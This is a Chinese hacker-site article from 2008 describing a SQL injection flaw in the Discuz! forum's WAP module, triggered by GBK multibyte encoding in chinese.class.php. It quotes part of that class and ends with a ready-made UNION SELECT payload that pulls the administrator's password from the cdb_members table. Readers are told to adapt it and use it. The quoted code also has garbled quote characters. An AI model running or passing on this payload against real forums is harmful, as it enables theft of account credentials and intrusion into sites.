黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·Discuz!论坛wap功能模块08-06·设计安全的文件上传功能08-06
·vbs版的sql查询分析器08-06·偷改账号 Windows Serve08-05
·龙西互联提供50M/ftp/AS08-05·在Vista系统中给收藏夹多08-04
·玩转Windows Vista系统中08-04·三维免费空间提供100-6008-04
·为程序设置快捷启动键提08-03·ADSL本地连接受限08-03
·瑞安信息网提供100M/asp08-03·教你彻底禁止暴风影音后08-02
·手把手教你如何让系统在08-02·闪耀数据中心提供200MB免08-02
·让WindowsXP不再出现内存08-01·HWay V3.0的使用教程08-01
·读取Serv-U管理员密码的08-01·无ARP欺骗的嗅探技术08-01
·WebSniff 1.008-01·体验ImageX 玩转系统映像08-01
·免费试用千元网络储存器08-01·云南数据港再次免费送出08-01
·601网络技术论坛提供16008-01·QQ文件及文件夹的一些小07-31
·EXE程序不能执行时的修复07-31·FileQube提供支持外链的07-31
·亚臣网络提供100M/ftp全07-31·豆丁网提供免费在线文档07-30
[推荐]Discuz!论坛wap功能模块编码的注入漏洞
        ★★★★★

Discuz!论坛wap功能模块编码的注入漏洞

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-8-6 10:51:26

由于发在blog上的漏洞资料给一位牛牛搞了.官方已出补丁.(由于 PHP 对 多字节字符集的支持存在问题,在各种编码相互转换过程中,有可能引发程序溢出和程序错误)
我很生气, 在这我说下过程:

以下是引用片段:
if(defined(’IN_DISCUZ’)) {
exit(’Access Denied’);
}
define(’CODETABLE_DIR’, DISCUZ_ROOT.’./include/tables/’);
class Chinese {
var $table = ’’;
var $iconv_enabled = false;
var $unicode_table = array();
var $config = array
(
’SourceLang’ => ’’,
’TargetLang’ => ’’,
’GBtoUnicode_table’ => ’gb-unicode.table’,
’BIG5toUnicode_table’ => ’big5-unicode.table’,
);
function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) {
$this->config[’SourceLang’] = $this->_lang($SourceLang);
$this->config[’TargetLang’] = $this->_lang($TargetLang);
if(!function_exists(’iconv’) && $this->config[’TargetLang’] != ‘BIG5′ && !$ForceTable) {
$this->iconv_enabled = true;
} else {
$this->iconv_enabled = false;
$this->OpenTable();
}
}
function _lang($LangCode) {
$LangCode = strtoupper($LangCode);
if(substr($LangCode, 0, 2) == ‘GB’) {
return ‘GBK’;
} elseif(substr($LangCode, 0, 3) == ‘BIG’) {
return ‘BIG5′;
} elseif(substr($LangCode, 0, 3) == ‘UTF’) {
return ‘UTF-8′;
} elseif(substr($LangCode, 0, 3) == ‘UNI’) {
return ‘UNICODE’;
}
}
function _hex2bin($hexdata) {
for($i=0; $i < strlen($hexdata); $i += 2) {
$bindata .= chr(hexdec(substr($hexdata, $i, 2)));
}
return $bindata;
}
chinese.class.php (utf-8不能利用)
searchid=22%cf’UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit
以上各位自己修改去用吧!

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886